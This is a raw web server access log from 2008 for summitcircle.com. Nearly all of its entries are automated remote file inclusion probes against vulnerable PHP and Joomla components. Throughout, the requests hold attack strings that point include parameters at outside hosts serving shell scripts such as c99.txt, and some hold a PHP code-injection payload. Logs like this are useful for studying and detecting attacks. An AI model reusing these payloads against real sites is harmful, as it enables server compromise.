75.125.201.18 - - [20/Jul/2008:17:18:06 -0700] "GET /logs/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
218.38.12.93 - - [20/Jul/2008:17:19:19 -0700] "GET /logs/access_080616.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
218.38.12.93 - - [20/Jul/2008:17:19:20 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
218.38.12.93 - - [20/Jul/2008:17:19:20 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
189.73.196.247 - - [20/Jul/2008:17:19:34 -0700] "GET /index.php?pagina=http://h1.ripway.com/heidik/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
77.222.40.49 - - [20/Jul/2008:17:19:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/sourc3rs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.222.40.49 - - [20/Jul/2008:17:19:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/sourc3rs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.222.40.49 - - [20/Jul/2008:17:19:47 -0700] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/sourc3rs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.222.40.49 - - [20/Jul/2008:17:19:47 -0700] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/sourc3rs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.127.253.161 - - [20/Jul/2008:17:20:27 -0700] "GET /logs/access_071008.log///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.127.253.161 - - [20/Jul/2008:17:20:28 -0700] "GET ///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.127.253.161 - - [20/Jul/2008:17:20:28 -0700] "GET /logs///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.29.4.54 - - [20/Jul/2008:17:20:41 -0700] "GET /logs/access_071217.log//classes/adodbt/sql.php?classes_dir=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.29.4.54 - - [20/Jul/2008:17:20:46 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.29.4.54 - - [20/Jul/2008:17:20:51 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:21:46 -0700] "GET /logs/access_071111.log//admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:21:46 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
207.44.230.33 - - [20/Jul/2008:17:22:01 -0700] "GET /logs/access_080526.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.44.230.33 - - [20/Jul/2008:17:22:01 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.44.230.33 - - [20/Jul/2008:17:22:01 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
83.103.23.40 - - [20/Jul/2008:17:22:15 -0700] "GET /logs/access_071217.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.chonil.co.kr/zboard/lost/motd/01.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.103.23.40 - - [20/Jul/2008:17:22:15 -0700] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.chonil.co.kr/zboard/lost/motd/01.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:22:16 -0700] "GET /logs/access_071111.log//admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:22:16 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:22:16 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
217.198.149.178 - - [20/Jul/2008:17:22:17 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:22:37 -0700] "GET /logs/access_071119.log//admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
216.246.78.141 - - [20/Jul/2008:17:22:47 -0700] "GET /logs/access_080526.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.246.78.141 - - [20/Jul/2008:17:22:48 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.246.78.141 - - [20/Jul/2008:17:22:49 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:22:56 -0700] "GET /logs/access_071119.log//admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.44.230.33 - - [20/Jul/2008:17:22:56 -0700] "GET /logs/access_071231.log//step_one.php?server_inc=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
207.44.230.33 - - [20/Jul/2008:17:22:56 -0700] "GET //step_one.php?server_inc=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
207.44.230.33 - - [20/Jul/2008:17:22:57 -0700] "GET /logs//step_one.php?server_inc=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
207.44.230.33 - - [20/Jul/2008:17:22:58 -0700] "GET /logs/access_080127.log//step_one.php?server_inc=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.44.230.33 - - [20/Jul/2008:17:22:58 -0700] "GET //step_one.php?server_inc=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.44.230.33 - - [20/Jul/2008:17:22:58 -0700] "GET /logs//step_one.php?server_inc=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
190.75.72.121 - - [20/Jul/2008:17:23:13 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://realbori.com/bbs/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
190.75.72.121 - - [20/Jul/2008:17:23:13 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://realbori.com/bbs/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
190.75.72.121 - - [20/Jul/2008:17:23:13 -0700] "GET /logs/access_080526.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://realbori.com/bbs/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:24:03 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
218.38.12.93 - - [20/Jul/2008:17:24:21 -0700] "GET /logs/access_071224.log///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
218.38.12.93 - - [20/Jul/2008:17:24:21 -0700] "GET ///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
218.38.12.93 - - [20/Jul/2008:17:24:22 -0700] "GET /logs///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
202.181.105.117 - - [20/Jul/2008:17:25:51 -0700] "GET /logs/access_080526.log/index.php?side=http://veb-siegen.de/wp-content/themes/veb/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [20/Jul/2008:17:25:51 -0700] "GET /logs/index.php?side=http://veb-siegen.de/wp-content/themes/veb/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [20/Jul/2008:17:25:51 -0700] "GET /index.php?side=http://veb-siegen.de/wp-content/themes/veb/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
218.38.12.93 - - [20/Jul/2008:17:25:57 -0700] "GET /logs/access_080121.log///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:26:47 -0700] "GET /logs/access_080511.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
87.106.65.144 - - [20/Jul/2008:17:26:47 -0700] "GET /logs/access_080602.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:26:47 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
87.106.65.144 - - [20/Jul/2008:17:26:47 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:26:47 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
87.106.65.144 - - [20/Jul/2008:17:26:47 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
210.127.253.161 - - [20/Jul/2008:17:27:06 -0700] "GET /logs/access_080616.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.127.253.161 - - [20/Jul/2008:17:27:07 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.127.253.161 - - [20/Jul/2008:17:27:07 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.77.135.204 - - [20/Jul/2008:17:27:09 -0700] "GET /logs/access_071231.log//*.*.php?pagina=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
69.134.194.137 - - [20/Jul/2008:17:27:28 -0700] "GET / HTTP/1.1" 200 779 "http://www.ebusiness-gateway.co.uk/documents/skype.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.2; .NET CLR 3.5.21022)" "www.summitcircle.com"
69.134.194.137 - - [20/Jul/2008:17:27:29 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.2; .NET CLR 3.5.21022)" "www.summitcircle.com"
87.106.65.144 - - [20/Jul/2008:17:27:50 -0700] "GET /logs/access_080421.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:28:24 -0700] "GET /logs/access_080602.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:28:25 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:28:25 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
87.106.65.144 - - [20/Jul/2008:17:28:25 -0700] "GET /logs/access_080602.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.65.144 - - [20/Jul/2008:17:28:25 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.65.144 - - [20/Jul/2008:17:28:25 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.65.144 - - [20/Jul/2008:17:28:34 -0700] "GET /logs/access_080602.log/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.65.144 - - [20/Jul/2008:17:28:35 -0700] "GET /errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.65.144 - - [20/Jul/2008:17:28:35 -0700] "GET /logs/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.217.156.81 - - [20/Jul/2008:17:28:38 -0700] "GET /logs/access_070903.log//skin/zero_vote/error.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:28:46 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:28:46 -0700] "GET /logs/access_080602.log/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:28:47 -0700] "GET /errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:28:47 -0700] "GET /logs/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:29:21 -0700] "GET /logs/access_080421.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
87.106.65.144 - - [20/Jul/2008:17:29:35 -0700] "GET /logs/access_080421.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.65.144 - - [20/Jul/2008:17:29:37 -0700] "GET /logs/access_080421.log/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
80.67.25.19 - - [20/Jul/2008:17:29:53 -0700] "GET /logs/access_071112.log/modules/xfsection//modify.php?dir_module=http://neu_2.lasrv-1.de/web/%20/.../ident.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
80.67.25.19 - - [20/Jul/2008:17:29:53 -0700] "GET /logs/modules/xfsection//modify.php?dir_module=http://neu_2.lasrv-1.de/web/%20/.../ident.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
80.67.25.19 - - [20/Jul/2008:17:29:53 -0700] "GET /modules/xfsection//modify.php?dir_module=http://neu_2.lasrv-1.de/web/%20/.../ident.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:29:53 -0700] "GET /logs/access_080421.log/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:30:05 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:30:06 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:30:07 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:30:07 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
63.247.139.189 - - [20/Jul/2008:17:30:21 -0700] "GET /logs/access_080204.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
63.247.139.189 - - [20/Jul/2008:17:30:21 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
63.247.139.189 - - [20/Jul/2008:17:30:21 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:30:32 -0700] "GET /logs/access_080602.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:30:32 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:30:32 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
217.217.156.81 - - [20/Jul/2008:17:30:38 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "summitcircle.com"
80.67.25.19 - - [20/Jul/2008:17:30:44 -0700] "GET /logs/access_070924.log/modules/xfsection//modify.php?dir_module=http://neu_2.lasrv-1.de/web/%20/.../ident.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
217.217.156.81 - - [20/Jul/2008:17:30:45 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "summitcircle.com"
70.86.134.34 - - [20/Jul/2008:17:31:11 -0700] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
218.38.12.93 - - [20/Jul/2008:17:31:18 -0700] "GET /logs///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
218.38.12.93 - - [20/Jul/2008:17:31:18 -0700] "GET ///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:31:55 -0700] "GET /index.php?url=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:31:55 -0700] "GET /logs/index.php?url=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
